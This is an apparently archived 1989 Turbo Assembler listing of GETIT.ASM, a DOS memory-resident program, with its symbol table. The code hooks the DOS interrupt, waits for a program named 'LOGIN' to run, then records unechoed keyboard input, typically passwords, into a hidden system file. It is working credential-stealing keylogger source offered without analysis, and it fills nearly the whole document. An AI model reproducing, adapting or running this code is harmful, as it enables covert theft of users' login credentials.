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File List  |  1989-02-16  |  14KB  |  267 lines

  1. Turbo Assembler  Version 1.0        02-16-89 17:10:37         Page 1
  4.       1 0000                         cseg   segment
  5.       2                                     assume cs:cseg,ds:cseg
  6.       3                                     org 100h
  7.       4                                     public oi21,ac,ob,fn,fh,flag,ni21,jtov,oc,lethro,wpwtf,exist,create,
  8.       5                                     public cntr,lits,begin
  9.       6                              .RADIX 16
  10.       7 0100                         start:
  11.       8 0100  0E                            push cs
  12.       9 0101  0E                            push cs
  13.      10 0102  0E                            push cs
  14.      11 0103  1F                            pop ds
  15.      12 0104  07                            pop es
  16.      13 0105  B8 FFFE                       mov ax,0fffeh
  17.      14 0108  FA                            CLI
  18.      15 0109  17                            pop ss
  19.      16 010A  8B E0                         mov sp,ax
  20.      17 010C  FB                            STI
  21.      18 010D  E9 02C0                       jmp begin
  22.      19 0110  ????????               oi21   dd ?
  23.      20 0114  0000                   ac     dw 0
  24.      21 0116  80*(????)              ob     dw 80h dup (?)
  25.      22 0216  80*(??)                buff2   db 80h dup (?)
  26.      23 0296  63 3A 5C 74 65 73 74 + fn      db 'c:\testing',0FF,'.tmp',0
  27.      24       69 6E 67 FF 2E 74 6D +
  28.      25       70 00
  29.      26 02A6  4C 4F 47 49 4E         search1 db 'LOGIN'
  30.      27 02AB  00                     foundf db 0
  31.      28 02AC  0000                   fh     dw 0
  32.      29 02AE  00                     flag   db 0
  33.      30 02AF  0000                   cntr   dw 0
  34.      31
  35.      32 02B1                         ni21:
  36.      33                                     assume cs:cseg,ds:nothing,es:nothing
  37.      34
  38.      35 02B1  3D 4B00                        cmp ax,4b00h
  39.      36 02B4  74 4B                          je exec
  40.      37 02B6  2E: 80 3E 02ABr FF             cmp foundf,0ffh
  41.      38 02BC  75 0A                          jne nc
  42.      39 02BE  80 FC 08                      cmp ah,8
  43.      40 02C1  74 43                         je  oc
  44.      41 02C3  80 FC 07                      cmp ah,7
  45.      42 02C6  74 3E                         je  oc
  46.      43
  47.      44
  48.      45 02C8                         nc:
  49.      46 02C8  50                            push ax
  50.      47 02C9  2E: A0 02AEr                  mov al,cs:flag
  51.      48 02CD  F6 D0                         not al
  52.      49 02CF  3C 00                         cmp al,0
  53.      50 02D1  75 28                         jne jtov
  54.      51 02D3  2E: A1 02AFr                  mov ax,cntr
  55.      52 02D7  40                            inc ax
  56.      53 02D8  2E: A3 02AFr                  mov cntr,ax
  57.      54 02DC  3D 0031                       cmp ax,31h
  58.      55 02DF  72 1A                         jb  jtov
  59.      56 02E1  33 C0                         xor ax,ax
  60.      57 02E3  2E: A3 02AFr                  mov cntr,ax
  61.      58 02E7  2E: A2 02AEr                  mov flag,al
  62.      59 02EB  58                            pop ax
  63. Turbo Assembler  Version 1.0        02-16-89 17:10:37         Page 2
  66.      60 02EC  9C                            pushf
  67.      61 02ED  2E: FF 1E 0110r               call dword ptr [oi21]
  68.      62 02F2  1E                            push ds
  69.      63 02F3  0E                            push cs
  70.      64 02F4  1F                            pop ds
  71.      65 02F5  50                            push ax
  72.      66 02F6  53                            push bx
  73.      67 02F7  51                            push cx
  74.      68 02F8  52                            push dx
  75.      69 02F9  EB 78                         jmp short wpwtf
  76.      70 02FB                         jtov:
  77.      71 02FB  58                            pop ax
  78.      72 02FC  2E: FF 2E 0110r               jmp dword ptr cs:[oi21]
  79.      73 0301  E8 002C                exec:   call scanfor
  80.      74 0304  EB C2                          jmp nc
  81.      75 0306                         oc:
  82.      76
  83.      77 0306  9C                            pushf
  84.      78 0307  2E: FF 1E 0110r               call dword ptr cs:[oi21]
  85.      79                                     assume ds:cseg
  86.      80 030C  1E                            push ds
  87.      81 030D  0E                            push cs
  88.      82 030E  1F                            pop  ds
  89.      83 030F  50                            push ax
  90.      84 0310  53                            push bx
  91.      85 0311  51                            push cx
  92.      86 0312  52                            push dx
  93.      87 0313  8B 1E 0114r                   mov bx,ac
  94.      88 0317  88 07                         mov [bx],al
  95.      89 0319  43                            inc bx
  96.      90 031A  89 1E 0114r                   mov [ac],bx
  97.      91 031E  3C 0D                         cmp al,0dh
  98.      92 0320  75 08                         jne lethro
  99.      93 0322  C6 07 0A                      mov byte ptr [bx],0ah
  100.      94 0325  2E: F6 16 02AEr               not cs:[flag]
  101.      95 032A                         lethro:
  102.      96 032A  5A                            pop dx
  103.      97 032B  59                            pop cx
  104.      98 032C  5B                            pop bx
  105.      99 032D  58                            pop ax
  106.     100 032E  1F                            pop ds
  107.     101 032F  CF                            iret
  108.     102
  109.     103 0330                         scanfor:
  110.     104 0330  50                             push ax
  111.     105 0331  57                             push di
  112.     106 0332  56                             push si
  113.     107 0333  06                             push es
  114.     108 0334  1E                             push ds
  115.     109 0335  0E                             push cs
  116.     110 0336  0E                             push cs
  117.     111 0337  07                             pop es
  118.     112 0338  8B F2                          mov si,dx
  119.     113 033A  BF 0216r                       mov di,offset buff2
  120.     114 033D                         moveit:
  121.     115 033D  AC                             lodsb
  122.     116 033E  24 DF                          and al,0dfh
  123.     117 0340  AA                             stosb
  124.     118 0341  0A C0                          or al,al
  125. Turbo Assembler  Version 1.0        02-16-89 17:10:37         Page 3
  126. GETIT.ASM
  128.     119 0343  75 F8                          jnz moveit
  129.     120 0345  1F                             pop ds
  130.     121 0346  BF 0216r                       mov di,offset buff2
  131.     122 0349                         look:
  132.     123 0349  57                             push di
  133.     124 034A  BE 02A6r                       mov si,offset search1
  134.     125 034D  B9 0005                        mov cx,5
  135.     126 0350  F3> A6                         repe cmpsb
  136.     127 0352  5F                             pop di
  137.     128 0353  0B C9                          or cx,cx
  138.     129 0355  74 10                          jz foundit
  139.     130 0357  47                             inc di
  140.     131 0358  80 7D 05 00                    cmp byte ptr [di+5],0
  141.     132 035C  74 02                          je not_found
  142.     133 035E  EB E9                          jmp look
  143.     134 0360                         not_found:
  144.     135 0360  33 C0                          xor ax,ax
  145.     136 0362  A2 02ABr                       mov foundf,al
  146.     137 0365  EB 06                          jmp short endofsearch
  147.     138 0367                         foundit:
  148.     139 0367  B8 00FF                        mov ax,0ffh
  149.     140 036A  A2 02ABr                       mov foundf,al
  150.     141 036D                         endofsearch:
  151.     142 036D  1F                             pop ds
  152.     143 036E  07                             pop es
  153.     144 036F  5E                             pop si
  154.     145 0370  5F                             pop di
  155.     146 0371  58                             pop ax
  156.     147 0372  C3                             ret
  157.     148
  158.     149
  159.     150 0373                         wpwtf:
  160.     151 0373  B8 3D02                       mov ax,3d02h
  161.     152 0376  BA 0296r                      mov dx,offset fn
  162.     153 0379  9C                            pushf
  163.     154 037A  FF 1E 0110r                   call dword ptr [oi21]
  164.     155 037E  73 17                         jnc exist
  165.     156 0380  3C 02                         cmp al,2
  166.     157 0382  74 02                         je create
  167.     158 0384  EB A4                         jmp lethro
  168.     159 0386                         create:
  169.     160 0386  B4 3C                         mov ah,3ch
  170.     161 0388  BA 0296r                      mov dx,offset fn
  171.     162 038B  B9 0006                       mov cx,02h+04h
  172.     163 038E  9C                            pushf
  173.     164 038F  FF 1E 0110r                   call dword ptr [oi21]
  174.     165 0393  73 02                         jnc exist
  175.     166 0395  EB 93                         jmp lethro
  176.     167 0397                         exist:
  177.     168 0397  A3 02ACr                      mov fh,ax
  178.     169 039A  8B D8                         mov bx,ax
  179.     170 039C  B8 4202                       mov ax,4202h
  180.     171 039F  33 C9                         xor cx,cx
  181.     172 03A1  33 D2                          xor dx,dx
  182.     173 03A3  9C                            pushf
  183.     174 03A4  FF 1E 0110r                   call dword ptr[oi21]
  184.     175 03A8  8B 0E 0114r                   mov cx,[ac]
  185.     176 03AC  BA 0116r                      mov dx,offset ob
  186.     177 03AF  2B CA                         sub cx,dx
  187. Turbo Assembler  Version 1.0        02-16-89 17:10:37         Page 4
  188. GETIT.ASM
  190.     178 03B1  89 16 0114r                   mov [ac],dx
  191.     179 03B5  41                            inc cx
  192.     180 03B6  8B 1E 02ACr                   mov bx,fh
  193.     181 03BA  B4 40                         mov ah,40h
  194.     182 03BC  9C                            pushf
  195.     183 03BD  FF 1E 0110r                   call dword ptr [oi21]
  196.     184 03C1  B4 3E                         mov ah,3eh
  197.     185 03C3  8B 1E 02ACr                   mov bx,fh
  198.     186 03C7  9C                            pushf
  199.     187 03C8  FF 1E 0110r                   call dword ptr [oi21]
  200.     188 03CC  E9 FF5B                       jmp lethro
  201.     189
  202.     190
  203.     191 03CF  90                     lits   db 90h
  204.     192 03D0                         begin:
  205.     193 03D0  B8 0116r                      mov ax,offset ob
  206.     194 03D3  A3 0114r                      mov [ac],ax
  207.     195 03D6  B8 3521                       mov ax,3521h
  208.     196 03D9  CD 21                         int 21h
  209.     197 03DB  BF 0110r                      mov di,offset oi21
  210.     198 03DE  89 1D                         mov [di],bx
  211.     199 03E0  8C 45 02                      mov [di+2],es
  212.     200 03E3  BA 02B1r                      mov dx,offset ni21
  213.     201 03E6  0E                            push cs
  214.     202 03E7  1F                            pop ds
  215.     203 03E8  B8 2521                       mov ax,2521h
  216.     204 03EB  CD 21                         int 21h
  217.     205 03ED  BA 03CFr                      mov dx,offset lits
  218.     206 03F0  CD 27                         int 27h
  219.     207 03F2                         cseg   ends
  220.     208                                     end start
  221. Turbo Assembler  Version 1.0        02-16-89 17:10:37         Page 5
  222. Symbol Table
  225. Symbol Name             Type   Value                       Cref  defined at #
  227. ??DATE                  Text   "02-16-89"
  228. ??FILENAME              Text   "GETIT   "
  229. ??TIME                  Text   "17:10:34"
  230. ??VERSION               Number 0100
  231. @CPU                    Text   0101H
  232. @CURSEG                 Text   CSEG                        #1
  233. @FILENAME               Text   GETIT
  234. @WORDSIZE               Text   2                           #1
  235. AC                      Word   CSEG:0114                   4  #20  87  90  175  178  194
  236. BEGIN                   Near   CSEG:03D0                   5  18  #192
  237. BUFF2                   Byte   CSEG:0216                   #22  113  121
  238. CNTR                    Word   CSEG:02AF                   5  #30  51  53  57
  239. CREATE                  Near   CSEG:0386                   4  157  #159
  240. ENDOFSEARCH             Near   CSEG:036D                   137  #141
  241. EXEC                    Near   CSEG:0301                   36  #73
  242. EXIST                   Near   CSEG:0397                   4  155  165  #167
  243. FH                      Word   CSEG:02AC                   4  #28  168  180  185
  244. FLAG                    Byte   CSEG:02AE                   4  #29  47  58  94
  245. FN                      Byte   CSEG:0296                   4  #23  152  161
  246. FOUNDF                  Byte   CSEG:02AB                   #27  37  136  140
  247. FOUNDIT                 Near   CSEG:0367                   129  #138
  248. JTOV                    Near   CSEG:02FB                   4  50  55  #70
  249. LETHRO                  Near   CSEG:032A                   4  92  #95  158  166  188
  250. LITS                    Byte   CSEG:03CF                   5  #191  205
  251. LOOK                    Near   CSEG:0349                   #122  133
  252. MOVEIT                  Near   CSEG:033D                   #114  119
  253. NC                      Near   CSEG:02C8                   38  #45  74
  254. NI21                    Near   CSEG:02B1                   4  #32  200
  255. NOT_FOUND               Near   CSEG:0360                   132  #134
  256. OB                      Word   CSEG:0116                   4  #21  176  193
  257. OC                      Near   CSEG:0306                   4  40  42  #75
  258. OI21                    Dword  CSEG:0110                   4  #19  61  72  78  154  164  174  183  187  197
  259. SCANFOR                 Near   CSEG:0330                   73  #103
  260. SEARCH1                 Byte   CSEG:02A6                   #26  124
  261. START                   Near   CSEG:0100                   #7  208
  262. WPWTF                   Near   CSEG:0373                   4  69  #150
  264. Groups & Segments       Bit Size Align  Combine Class      Cref  defined at #
  266. CSEG                    16  03F2 Para   none               #1  2  2  33  79